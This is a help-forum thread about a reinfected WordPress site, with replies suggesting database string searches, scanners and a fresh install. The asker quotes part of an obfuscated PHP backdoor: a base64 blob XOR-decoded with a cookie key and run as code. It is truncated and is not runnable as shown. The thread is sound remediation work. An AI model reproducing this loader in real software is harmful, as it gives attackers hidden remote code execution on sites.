# infected files in wordpress

Tags: wordpress, security, virus

I have a blog in wordpress infected with a virus, which creates .php files, I have already searched and performed several actions without having good results. I used to create code by inserting it into `wp-config.php` by linking to .ico files in different folders.

Now I have changed the hosting, installed everything in wordpress from scratch, loaded the theme, imported the database, and uploaded the uploads folder.
Everything was fine, two days ago, until today, I created the file `fapwmudc.php_malicious_base64code_createfunction_infected.php`, in `wp-includes/` and two more files in a plugin and in the theme, I have already deleted them.

The `.php` code is something like this:

```
<? php
$ zpmez =
'bGUpJGZpJztwJHRlaGFuX0xPc1snaGlzc3ViLT5zTWFpb2F1JykpPChofX0kYWRlZGl'.
'uIiwkaW9uIFhvZWFkSGVhcy0 + R0lOZGViaWMgXXszPiR0MDt0eHQsdGhpdGVtY2lwdG'.

//Many more lines ... and closes

'KSg =='
), $ _COOKIE [str_replace ('.', '_', $ _SERVER ['HTTP_HOST'])]). ';'); $ _bnvhbl ($ zpmez);

function bnvhbl ($ cdltur, $ eouvqa) {return $ cdltur ^ str_repeat ($ eouvqa, ceil (strlen ($ cdltur) / strlen ($ eouvqa))); }
?>
```

The virus has to be in the theme or in the database, how can I find it?
I've already used all the plugins to use, sucuri, wordfence (it's the easiest thing to find files for me), string locator, to search for code strings. and many others.

Comment: I think it would be helpful if you provided the theme and plugins that you are using. Have you tried disabling them individually to try and isolate the problem.

Comment: If your theme is the source of the malware, Wordfence will surely find it. As others have suggested, the malicious code may have been injected into your database. Open your `database_backup.sql` file using a text editor and do a text search (eg. `str_repeat` or `_COOKIE`).

Answer (score 0):

Well by the sounds of it, the 'virus' itself may be bound to the actual database. You may be able to do a few global searches (for example I would search for 'zpmez') for some of the related keywords within your database to see if anything comes up.

If it's the theme, or plugin which actually caused the 'virus', I would recommend only using premium themes and plugins which are commonly used and have thousands of downloads, and are recently updated. Generally speaking de-bunked or cracked themes and plugins do this, and have their own hidden cron job which runs days after they're installed, making you think at the time of installation that everything was OK, giving the virus time to infect your tables.

I hope you didn't have a bunch of content on your website because at the end of the day you may need to start with a fresh install, with a different theme/set of plugins...Good luck.